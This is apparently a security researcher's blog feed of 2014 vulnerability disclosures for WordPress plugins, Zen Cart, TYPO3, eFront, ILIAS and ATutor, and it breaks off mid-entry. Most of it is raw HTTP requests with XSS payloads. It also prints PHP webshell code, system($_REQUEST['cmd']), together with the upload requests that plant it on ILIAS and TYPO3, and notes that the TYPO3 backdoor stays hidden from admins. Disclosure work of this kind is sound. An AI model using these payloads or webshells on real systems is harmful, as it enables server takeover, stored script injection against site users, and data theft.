premiumList='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&canWatchPremium=all&watchListPremium=Super+Admin%2C+Administrator%2C+Editor%2C+Author%2C+Contributor%2C+Subscriber&pLogo=1&transcoding=1&alwaysRTMP=0&pBroadcastTime=0&pWatchTime=0&timeReset=30&pCamBandwidth=65536&pCamMaxBandwidth=163840&submit=Save+Changes
---<request>---

Also vulnerable: watchListPremium, pBroadcastTime, timeReset, pCamBandwidth


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] XSS in WP Post to PDF

# ==============================================================
# Title ...| XSS in WP Post to PDF
# Version .| wp-post-to-pdf.2.3.1
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 827

option_page=wpptopdf_options&action=update&_wpnonce=578db9a23d&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-post-to-pdf%2Fwp-post-to-pdf.php&wpptopdf%5Bpost%5D=1&wpptopdf%5Bpage%5D=1&wpptopdf%5Binclude%5D=0&wpptopdf%5BexcludeThis%5D=&wpptopdf%5BincludeCache%5D=0&wpptopdf%5BexcludeThisCache%5D=&wpptopdf%5BiconPosition%5D=before&wpptopdf%5BimageIcon%5D=%3Cimg+alt%3D%22Download+PDF%22+src%3D%22http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%2Fwp-content%2Fplugins%2Fwp-post-to-pdf%2Fasset%2Fimages%2Fpdf.png%22%3E&wpptopdf%5BheaderFont%5D=helvetica&wpptopdf%5BheaderFontSize%5D=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&wpptopdf%5BfooterFont%5D=helvetica&wpptopdf%5BfooterFontSize%5D=10&wpptopdf%5BcontentFont%5D=helvetica&wpptopdf%5BcontentFontSize%5D=12&wpptopdf%5Bsubmit%5D=Save+Changes
---<request>---

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

Tuesday 25 February 2014

[EN] Wordpress plugin Zedity vulnerable to XSS

# ==============================================================
# Title ...| Zedity XSS
# Version .| zedity.2.4.0
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---

POST /k/wordpress/wp-admin/admin-ajax.php?action=zedity_ajax HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

zaction=<body onload=alert(123)>&id=&post_id=28&title=aaaaaaa&content=%3Cdiv+data-
origh%3D%22600%22+data-origw%3D%22600%22+style%3D%22position%3A+relative%3B+width%
3A+600px%3B+height%3A+600px%3B+overflow%3A+hidden%3B%22+class%3D%22zedity-editor+z
edity-notheme%22+id%3D%22zed_olgrv8%22%3E%3Cdiv+class%3D%22zedity-watermark%22+sty
le%3D%22display%3Anone%3Btop%3A0%3Bleft%3A0%3B%22+data-pos%3D%22none%22%3E%3Cspan+
style%3D%22color%3A%23ffd6ba%3Bfont-size%3A11px%3Bfont-family%3ATahoma%2CArial%2Cs
ans-serif%22%3EPowered+by+%3Ca+href%3D%22http%3A%2F%2Fzedity.com%22+target%3D%22_b
lank%22+style%3D%22font-size%3A11px%3Bfont-weight%3Abold%3Bcolor%3Awhite%3Bfont-fa
mily%3AVerdana%2CTahoma%3Btext-decoration%3Anone%3B%22%3EZedity%3C%2Fa%3E%3C%2Fspa
n%3E%3C%2Fdiv%3E%3C%2Fdiv%3E

---<request>---

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] Wordpress plugin EasyMedia Gallery vulnerable

# ==============================================================
# Title ...|EasyMedia Gallery XSS
# Version .| easy-media-gallery.1.2.29
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================


# ==============================================================
# EasyMedia Gallery XSS

---<request>---

POST /k/wordpress/wp-admin/edit.php?post_type=easymediagallery&page=emg_settings HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1452

option_page=easy_options_group&action=update&_wpnonce=e4392a9119&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Fedit.php%3Fpost_type%3Deasymediagallery%26page%3Demg_settings&easymedia_columns=3&easymedia_alignstyle=Center&easymedia_img_size_limit='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&easymedia_vid_size%5Bwidth%5D=700&easymedia_vid_size%5Bheight%5D=400&easymedia_disen_autoplv=1&easymedia_disen_autopl=1&easymedia_disen_audio_loop=1&easymedia_audio_vol=100&easymedia_box_style=Light&easymedia_cur_style=Pointer&easymedia_mag_icon=Icon-0&easymedia_frm_size%5Bwidth%5D=160&easymedia_frm_size%5Bheight%5D=160&easymedia_frm_col=%23FFFFFF&easymedia_ttl_col=%23C7C7C7&easymedia_brdr_rds=3&easymedia_thumb_col=%23000000&easymedia_hover_opcty=40&easymedia_style_pattern=pattern-01.png&easymedia_disen_bor=1&easymedia_disen_hovstyle=1&save3=Save+Changes&easymedia_disen_plug=1&easymedia_disen_rclick=1&easymedia_disen_databk=1&easymedia_disen_admnotify=1&easymedia_disen_dasnews=1&easymedia_ajax_con_id=%23content&easymedia_plugin_core=core-1.4.5-min&easymedia_plugin_wpinfo=-+WP+Version+%3A+3.8.1%0D%0A-+EMG-Lite+Version+%3A+1.2.29%0D%0A-+Site+URL+%3A+http%3A%2F%2F10.149.14.62%2Fk%2Fwordpress%0D%0A-+WP+Multisite+%3A+NO%0D%0A-+PHP+Direct+Access+%3A+YES%0D%0A-+Memory+Limit+%3A+128+MB%0D%0A-+Active+Theme+%3A+Twenty+Fourteen%0D%0A-+Active+Plugins+%3A+%0D%0A+%C2%A0%C2%A0%C2%A0%C2%A0Easy+Media+Gallery%0D%0A+%C2%A0%C2%A0%C2%A0%C2%A0Zedity%0D%0A&action=save

---<request>---


Also vulnerable are: easymedia_vid_size%5Bwidth%5D, easymedia_vid_size%5Bheight%5D,
easymedia_frm_size%5Bwidth%5D, easymedia_ttl_col, easymedia_thumb_col,
easymedia_hover_opcty, easymedia_style_pattern, easymedia_ajax_con_id


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] Wordpress plugin Thanks You Counter Button vulnerable to XSS

# ==============================================================
# Title ...| Thanks You Counter Button XSS
# Version .| thanks-you-counter-button 1.8.7
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.wordpress.org/plugins/
# ==============================================================


# ==============================================================
# XSS

---<request>---
POST /k/wordpress/wp-admin/options.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 806

option_page=thankyoubutton-options&action=update&_wpnonce=ed03a9f018&_wp_http_referer=%2Fk%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dthankyou.php&thanks_display_page=1&thanks_display_home=1&thanks_position_firstpageonly=1&thanks_position_lastpageonly=1&thanks_caption='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&thanks_style=float%3A+left%3B+margin-right%3A+10px%3B&thanks_caption_style=font-family%3A+Verdana%2C+Arial%2C+Sans-Serif%3B+font-size%3A+14px%3B+font-weight%3A+normal%3B&thanks_caption_color=%23ffffff&thanks_size=large&thanks_form=rounded&thanks_color=blue&thanks_custom_url=&thanks_custom_glow_url=&thanks_custom_width=100&thanks_custom_height=26&thanks_check_ip_address=1&thanks_time_limit%5B%5D=1&thanks_time_limit_seconds=60&thanks_display_settings_shortcuts=1&submit=Save+Changes
---<request>---

[+] Also vulnerable are: thanks_caption_style, thanks_style


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] Wordpress plugin FeedWeb vulnerable to XSS

# ==============================================================
# Title ...| DOM-based XSS in FeedWeb
# Version .| feedweb.2.4
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://www.wordpress.org/plugins/
# ==============================================================


# ==============================================================
# DOM-based XSS

---<request>---
POST /k/wordpress/wp-content/plugins/feedweb/feedweb_settings.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 666

_wp_http_referer=";</script><script>alert(123)</script>&DelayResults=0&FeedwebLanguage=en&FeedwebMPWidgets=0&RatingWidgetType=H&AutoAddParagraphs=0&InsertWidgetPrompt=1&RatingWidgetLayout=wide&RatingWidgetPlacement=0&RatingWidgetColorScheme=gray&FrontWidgetItemCount=&ResultsBeforeVoting=0&FeedwebCopyrightNotice=0&FrontWidgetHideScroll=0&FrontWidgetColorScheme=classic&WidgetPlaceRadio=on&WidgetTypeSwitch=-&RatingWidgetColorSchemeBox=gray&ExternalBackgroundBox=FFFFFF&WidgetLanguageBox=en&WidgetLayoutBox=wide&WidgetWidthEdit=400&DelayResultsBox=0&WidgetPromptBox=on&FrontWidgetColorSchemeBox=classic&FrontWidgetHeightEdit=400&ItemCountBox=3&submit=Save+Changes
---<request>---

# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

Monday 24 February 2014

[EN] Multiple XSS / Shell upload possibility in latest ZenCart

# ==============================================================
# Title ...| Multiple vulnerabilities in Zen Cart e-commerce
# Version .| zen-cart-v1.5.1-full-fileset-09182012
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....|
# ==============================================================

[+] For not-authenticated user:

# ==============================================================
# 1.  Redirection to any (phishing?) site:

---<request>---
10.149.14.62//k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/index.php?main_page=redirect&action=url&goto=www.google.com

---<request>---

==============================================================
[+] For admin user logged-in

# ==============================================================
# 2. XSS

---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/gv_mail.php?action=preview HTTP/1.1
Host: 10.149.14.62
(...)
Content-Type: application/x-www-form-urlencoded
Content-Length: 232

securityToken=c708c6bfb991c954612cf368ba24b1b2&customers_email_address=&email_to='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&from=admin%40here.com&subject=asd&amount=123&message=We%27re+pleased+to+offer+you+a+Gift+Certificate&x=27&y=8
---<request>---


# ==============================================================
# 3. XSS

---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/coupon_admin.php?action=update&oldaction=new&cid=0&page=0 HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&coupon_name%5B1%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&coupon_desc%5B1%5D=asd&coupon_amount=123&coupon_min_order=2&coupon_free_ship=on&coupon_code=123123&coupon_uses_coupon=&coupon_uses_user=1&coupon_startdate_day=24&coupon_startdate_month=2&coupon_startdate_year=2014&coupon_finishdate_day=24&coupon_finishdate_month=2&coupon_finishdate_year=2015&coupon_zone_restriction=0&x=58&y=14
---<request>---


Also vulnerable are:
coupon_desc%5B1%5D, coupon_min_order,coupon_free_ship, coupon_code,coupon_uses_coupon, coupon_uses_user


# ==============================================================
# 4. XSS

---<request>---

POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/developers_tool_kit.php?action=locate_configuration HTTP/1.1
Host: 10.149.14.62
(...)

securityToken=c708c6bfb991c954612cf368ba24b1b2&configuration_key='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&zv_files=1&x=16&y=6

---<request>---


# ==============================================================
# 5. XSS

---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/geo_zones.php?zpage=1&zID=1&action=insert_zone HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&geo_zone_name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&geo_zone_description=asdasdasd&x=26&y=149

---<request>---



# ==============================================================
# 6. XSS

---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/orders_status.php?page=1&action=insert HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&orders_status_name%5B1%5D=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&x=29&y=10

---<request>---



# ==============================================================
# 7. XSS

---<request>---
POST /k/cms/zen/zen-cart-v1.5.1-full-fileset-09182012/admin123/countries.php?page=1&action=insert HTTP/1.1
Host: 10.149.14.62
(...)
securityToken=c708c6bfb991c954612cf368ba24b1b2&countries_name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&countries_iso_code_2=asd&countries_iso_code_3=asdasd&address_format_id=1&x=30&y=10
---<request>---



# ==============================================================
# 8. Shell upload possibility when creating new category:


k@lab:~/public_html/cms/zen/zen-cart-v1.5.1-full-fileset-09182012$ find ./ | grep shell.php
./images/categories/mishell.php
k@lab:~/public_html/cms/zen/zen-cart-v1.5.1-full-fileset-09182012$

;)


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] Multiple vulnerabilities in Typo3 6.1.7

During last days I found few vulnerabilities in latest TYPO3.

Feel free to ask if you have any questions. 
I will answer as soon as possible. ;)

# ==============================================================
# Title ...| Multiple vulnerabilities in Typo3 CMS
# Version .| introductionpackage-6.1.7
# Date ....| 24.02.2014
# Found ...| HauntIT Blog
# Home ....| www.typo3.org
# ==============================================================

[+] For admin user:

# ==============================================================
# 1. XSS

---<request>---
POST /k/cms/intro/introductionpackage-6.1.7/typo3/mod.php?M=tools_txschedulerM1&CMD=edit&tx_scheduler[uid]=1 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 329

SET%5Bfunction%5D=scheduler&CMD=save&tx_scheduler%5Buid%5D=1&previousCMD=edit&tx_scheduler%5Bdisable%5D=0&tx_scheduler%5Bclass%5D='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&tx_scheduler%5Btype%5D=2&tx_scheduler%5Bstart%5D=00%3A00+01-10-2011&tx_scheduler%5Bend%5D=&tx_scheduler%5Bfrequency%5D=0+*+*+*+*&tx_scheduler%5Bmultiple%5D=0
---<request>---

---<response>---
Class</label></abbr></span></td><td class="td-input">
()<input type="hidden" name="tx_scheduler[class]" id="task_class" value="'>"><body/onload=alert(9999)>" />
---<response>---


# ==============================================================
# 2. Shell upload possibility

If admin is logged in he can add 'extension' in ZIP file. So there is a possibility to install webshell
located in zipped PHP file. Backdoor will be available (like) here:
---<code>---
/home/k/public_html/cms/intro/introductionpackage-6.1.7/typo3conf/ext/mishell/mishell.php:1:
<?php system($_REQUEST['cmd']);?>
---<code>---

The 'good news' (for user who hijacked admin's accout) is that the backdoor won't be visible
from Extention Manager.


# ==============================================================
# 3. Information disclosure bug

---<request>---
POST /k/cms/intro/introductionpackage-6.1.7/typo3/mod.php?M=tools_ExtensionmanagerExtensionmanager&tx_extensionmanager_tools_extensionmanagerextensionmanager%5Baction%5D=extract&tx_extensionmanager_tools_extensionmanagerextensionmanager%5Bcontroller%5D=UploadExtensionFile&tx_extensionmanager_tools_extensionmanagerextensionmanager%5Bformat%5D=json HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1986

-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@extension]"

Extensionmanager
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@vendor]"

TYPO3\CMS
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@controller]"

UploadExtensionFile
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][@action]"

form
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__referrer][arguments]"

YToyOntzOjY6ImFjdGlvbiI7czo0OiJmb3JtIjtzOjEwOiJjb250cm9sbGVyIjtzOjE5OiJVcGxvYWRFeHRlbnNpb25GaWxlIjt9190c41a301fed009dff796152c31d68de5be7721
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[__trustedProperties]"

a:2:{s:13:"extensionFile";a:5:{s:4:"name";i:1;s:4:"type";i:1;s:8:"tmp_name";i:1;s:5:"error";i:1;s:4:"size";i:1;}s:9:"overwrite";i:1;}7b7da06281d8102e2c39d7a0d4d40655f5f5603c
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[extensionFile]"; filename="mishell.zip"
Content-Type: application/zip

blah...
-----------------------------147561664023554
Content-Disposition: form-data; name="tx_extensionmanager_tools_extensionmanagerextensionmanager[overwrite]"

'`"%3b--#%%2f%2a
-----------------------------147561664023554--

---<request>---

And then:

---<response>---

{"success":"true","extension":null,"error":"PHP Catchable Fatal Error: Argument 1 passed to TYPO3\\CMS\\Extensionmanager\\Utility\\InstallUtility::processDatabaseUpdates() must be of the type array, null given, called in \/home\/k\/public_html\/cms\/intro\/introductionpackage-6.1.7\/typo3\/sysext\/extensionmanager\/Classes\/Utility\/InstallUtility.php on line 133 and defined in \/home\/k\/public_html\/cms\/intro\/introductionpackage-6.1.7\/typo3\/sysext\/extensionmanager\/Classes\/Utility\/InstallUtility.php line 244"}
---<response>---

# ==============================================================
# 4. DOM-based XSS


---<request>---
GET /k/cms/intro/introductionpackage-6.1.7/typo3/sysext/rtehtmlarea/mod4/select_image.php?&RTEtsConfigParams=';//</script><script>alert(132)</script>&editorNo=data_tx_news_domain_model_news__NEW530b1d080b773__bodytext_&sys_language_content=0&contentTypo3Language=default HTTP/1.1
---<request>---

---<response>---
(...)
 '|data_tx_news_domain_model_news__NEW530b1d080b773__bodytext_:0|';//</script><script>alert(132)</script>|'); }
(...)
---<response>---



# ==============================================================
# 5. DOM-based XSS

---<request>---
GET /k/cms/intro/introductionpackage-6.1.7/typo3/sysext/rtehtmlarea/mod4/select_image.php?act=plain&bparams=|data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodytext_:0|tx_news_domain_model_news:NEW530b1d080b773:bodytext:0:0:0:|&editorNo=data_tx_news_domain_model_news__NEW530b1d080b773__bodytext_&sys_language_content=0&RTEtsConfigParams=tx_news_domain_model_news%3ANEW530b1d080b773%3Abodytext%3A0%3A0%3A0%3A HTTP/1.1
---<request>---


---<response>---
(...)
    var plugin = window.parent.RTEarea["data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodytext_"].editor.getPlugin("TYPO3Image");
    var HTMLArea = window.parent.HTMLArea;

    HTMLArea.TYPO3Image.insertElement = function (table, uid, type, filename, filePath, fileExt, fileIcon) {
        return jumpToUrl('?editorNo=' + 'data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodytext_' + '&insertImage=' + filePath + '&table=' + table + '&uid=' + uid + '&type=' + type + 'bparams=' + '|data_tx_n';//</script><script>alert(123123)</script>domain_model_news__NEW530b1d080b773__bodyte
(...)
---<response>---


====================================================================
[+] Now for  "simple_editor" user:
====================================================================


# ==============================================================
# 6. XSS


---<request>---
POST /k/cms/intro/introductionpackage-6.1.7/typo3/tce_file.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 349

file%5Beditfile%5D%5B0%5D%5Bdata%5D=%3C%3Fphp+phpinfo%28%29%3B+%3F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%0D%0A&target=1&file%5Beditfile%5D%5B0%5D%5Btarget%5D=180&redirect=%2Fk%2Fcms%2Fintro%2Fintroductionpackage-6.1.7%2Ftypo3%2Fmod.php%3F%26id%3D1%253A%252Fuser_upload%252Fdocuments%252Fasdasd%252F%26M%3Dfile_list%26SET%5BbigControlPanel%5D%3D1
---<request>---


# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] CMSMadeSimple 1.11.10 Cross Site Scripting

Thanks to PacketStormSecurity portal, we can see that my another
finding is publicly available ;)

All details you will find here.


[EN] eFront 3.6.14 Multiple vulnerabilities

Below few findings from yesterday and today...

# ==============================================================
# Title ...| eFront 3.6.14 Multiple vulnerabilities
# Version .| efront_3.6.14_build18016_community.zip
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| www.efrontlearning.net/download‎
# ==============================================================


# ==============================================================
# 1. Information disclosure
---<request>---
POST /k/cms/efront/www/student.php?ctg=personal&user='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&op=profile HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 1975

-----------------------------2032284762831
Content-Disposition: form-data; name="_qf__user_form"
(...)
---<request>---

---<response>---
($('secondlist')) {Sortable.destroy('secondlist');}">
<pre>#0 /home/k/public_html/cms/efront/libraries/includes/personal.php(29): EfrontUserFactory::factory(''>">')
#1 /home/k/public_html/cms/efront/www/student.php(554): include('/home/k/public_...')
#2 {main}</pre>

---<response>---


# ==============================================================
# 2. Persistent XSS (from admin)
---<request>---

POST /k/cms/efront/www/administrator.php?ctg=courses&add_course=1 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 269

_qf__add_courses_form=&qfS_csrf=c43145eed7151535528a08cf6281dc40&qfS_csrf=c43145eed7151535528a08cf6281dc40&name='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&directions_ID=1&languages_NAME=english&active=0&active=1&show_catalog=0&show_catalog=1&price=0&submit_course=Submit
---<request>---

# ===============================================================
# 3. Persistent XSS (again from admin, and again vulnerable is 'name' parameter)

---<request>---
POST /k/cms/efront/www/administrator.php?ctg=directions&add_direction=1 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 169

_qf__add_directions_form=&qfS_csrf=bcc380e9b626466a1f0829bc96174833&name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&parent_direction_ID=0&submit_direction=Submit
---<request>---

# ===============================================================
# 4. Persistent xss (name parameter again)

---<request>---
POST /k/cms/efront/www/administrator.php?ctg=user_types&add_user_type=1&basic_type=student HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 607

_qf__add_type_form=&qfS_csrf=9c7ab093513d78bf919b45393b618564&name=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&basic_user_type=student&core_access%5Bcontent%5D=change&core_access%5Busers%5D=change&core_access%5Bstatistics%5D=change&core_access%5Bpersonal_messages%5D=change&core_access%5Bcontrol_panel%5D=change&core_access%5Bmove_block%5D=change&core_access%5Bmodule_itself%5D=change&core_access%5Bdashboard%5D=change&core_access%5Binsert_group_key%5D=change&core_access%5Bcalendar%5D=change&core_access%5Bsurveys%5D=change&core_access%5Bnews%5D=change&core_access%5Bforum%5D=change&submit_type=Save
---<request>---



# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/

[EN] ILIAS 4.4.1 Cross Site Scripting / Shell Upload

In latest ILIAS I found few interesting bugs. Beside XSS's one of my favourite was
that bug, when if www-some-site has open registration, normal registered user is able to
upload shell in PHP. ;)

Below you will find what and where you can check, but You can read more about it also here.
 
# ==============================================================
# Title ...| Multiple vulnerabilities in ILIAS
# Version .| ilias-4.4.1.zip
# Date ....| 21.02.2014
# Found ...| HauntIT Blog
# Home ....| www.ilias.de
# ==============================================================

First from admin user logged in:

# ==============================================================
# 1. Persistent xss

---<request>---

POST /k/cms/ilias/ilias.php?wsp_id=2&cmd=post&cmdClass=ilobjbloggui&cmdNode=mw:my:ma&baseClass=
ilPersonalDesktopGUI&fallbackCmd=createPosting&rtoken=6bac7751a71721f25adb9e579dea4344 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 91

title=$("%3cimg%2fsrc%3d'x'%2fonerror%3dalert(9999)%3e")&cmd%5BcreatePosting%5D=Add+Posting
---<request>---


# ==============================================================
# 2. Possibility of uploading webshell
Uploaded file can be found in the ILIAS directories, for example:
---<code>---
k@lab:~/public_html/cms/ilias$ cat ./44444/ilFile/3/file_334/001/shell.php
<?php system($_REQUEST['cmd']); ?>
k@lab:~/public_html/cms/ilias$
---<code>---

Direct access to this file will give you a webshell.

* 
* This bug will be described later in section for 'normal/registered' user.
* 


# ==============================================================
# 3. XSS

---<request>---
POST /k/cms/ilias/ilias.php?ref_id=1&new_type=webr&cmd=post&cmdClass=ilobjlinkresourcegui&
cmdNode=nm:9y&baseClass=ilRepositoryGUI&rtoken=6bac7751a71721f25adb9e579dea4344 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 760

tar_mode=ext&tar='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&tar_val=%3Cdiv+id%3D%22tar_value
%22%3E%0D%0A%09%0D%0A%3C%2Fdiv%3E%09%0D%0A%3Cdiv+class%3D%22small%22%3E%0D%0A%09%3Ca+id%3D%
22tar_ajax%22+class%3D%22iosEditInternalLinkTrigger%22+href%3D%22ilias.php%3Fref_id%3D1%26n
ew_type%3Dwebr%26postvar%3Dtar%26cmdClass%3Dilinternallinkgui%26cmdNode%3Dnm%3A9y%3A3l%3A3z
%3A3s%3Ai1%26baseClass%3DilRepositoryGUI%26cmdMode%3Dasynch%22%3E%26raquo%3B+Select+Target+
Object%3C%2Fa%3E%0D%0A%3C%2Fdiv%3E%0D%0A%3Cdiv+class%3D%22small++ilNoDisplay%22+id%3D%22tar
_rem%22%3E%0D%0A%09%3Ca+class%3D%22ilLinkInputRemove%22+href%3D%22%23%22%3E%26raquo%3B+Remo
ve%3C%2Fa%3E%0D%0A%3C%2Fdiv%3E&tar_ajax_type=&tar_ajax_id=&tar_ajax_target=&tit=asdasd&des=
asdasd&cmd%5Bsave%5D=Add+Weblink

---<request>---

---<response>---

Target: <span class="asterisk">*</span><br />
      
<input type="text" name="links[4][tar]" value="'>"><body/onload=alert(9999)>" size="40" 
maxlength="500" />
      
---<response>---




# ==============================================================
# 4. Another webshell upload possibility

There is a possibility of creating webshell when php file is added as an attachement
to email to user(s).


All shells will be located in /ilias/ (wwwroot) directory with value from 'client_id'
(for example: client_id=44444, then your shell is in /ilias/44444/...)



# ==============================================================

Second: from normal/registered user logged in:

# ==============================================================
# 1. When normal user is registered on the latest ILIAS, he is able to add
PHP file contains simple shell. From this moment he will be able to hack 
the whole server.

---<request>---
POST /k/cms/ilias/ilias.php?wsp_id=41&new_type=file&cmd=post&cmdClass=
ilobjfilegui&cmdNode=mw:my:jh&baseClass=ilPersonalDesktopGUI&fallbackC
md=uploadFiles&rtoken=2e4e8af720b2204ea51503ca6388a325 HTTP/1.1
Host: 10.149.14.62
(...)
Cache-Control: no-cache

-----------------------------1761332042190
Content-Disposition: form-data; name="title"

shell.php
-----------------------------1761332042190
Content-Disposition: form-data; name="description"


-----------------------------1761332042190
Content-Disposition: form-data; name="extract"

0
-----------------------------1761332042190
Content-Disposition: form-data; name="keep_structure"

0
-----------------------------1761332042190
Content-Disposition: form-data; name="upload_files"; filename="shell.php"
Content-Type: application/octet-stream

<?php system($_REQUEST['cmd']); ?>
-----------------------------1761332042190--

---<request>---


# ==============================================================
# 2. XSS (same place like when admin is logged in)


---<request>---
POST /k/cms/ilias/ilias.php?wsp_id=41&new_type=webr&cmd=post&cmdClass=ilobjlinkresource
gui&cmdNode=mw:my:9y&baseClass=ilPersonalDesktopGUI&rtoken=1561f316d721f9683b0ae5f0b652db25 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 768

tar_mode=ext&tar='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&tar_val=%3Cdiv+id%3D%22
tar_value%22%3E%0D%0A%09%0D%0A%3C%2Fdiv%3E%09%0D%0A%3Cdiv+class%3D%22small%22%3E%0
D%0A%09%3Ca+id%3D%22tar_ajax%22+class%3D%22iosEditInternalLinkTrigger%22+href%3D%2
2ilias.php%3Fwsp_id%3D41%26new_type%3Dwebr%26postvar%3Dtar%26cmdClass%3Dilinternal
linkgui%26cmdNode%3Dmw%3Amy%3A9y%3A3l%3A3z%3A3s%3Ai1%26baseClass%3DilPersonalDeskt
opGUI%26cmdMode%3Dasynch%22%3E%26raquo%3B+Select+Target+Object%3C%2Fa%3E%0D%0A%3C%
2Fdiv%3E%0D%0A%3Cdiv+class%3D%22small++ilNoDisplay%22+id%3D%22tar_rem%22%3E%0D%0A%
09%3Ca+class%3D%22ilLinkInputRemove%22+href%3D%22%23%22%3E%26raquo%3B+Remove%3C%2F
a%3E%0D%0A%3C%2Fdiv%3E&tar_ajax_type=&tar_ajax_id=&tar_ajax_target=&tit=asdasd&des
=dsa&cmd%5Bsave%5D=Add+Weblink
---<request>---
 


# ==============================================================
# 3. Persistent xss

---<request>---
POST /k/cms/ilias/ilias.php?wsp_id=111&bmn=2014-02&cmd=post&cmdClass=ilobjbloggui&cmdNode=mw:my:ma&baseClass=ilPersonalDesktopGUI&fallbackCmd=createPosting&rtoken=1561f316d721f9683b0ae5f0b652db25 HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 89

title=%27%3E%22%3E%3Cbody%2Fonload%3Dalert%28123%29%3E&cmd%5BcreatePosting%5D=Add+Posting
---<request>---

[EN] ATutor 2.1.1 XSS

Last days I found few bugs in latest version of 2 popular webapplications. Both
you can find here but below you have detailed findings for latest ATutor (2.1.1).


# ==============================================================
# Title ...| ATutor Multiple vulnerabilities
# Version .| ATutor-2.1.1
# Date ....| 19.02.2014
# Found ...| HauntIT Blog
# Home ....| https://atutor.ca
# ==============================================================


# ==============================================================
# 1. During installation: xss and sql insertion:

---<request>---
POST /k/cms/atutor/ATutor/install/install.php HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 191

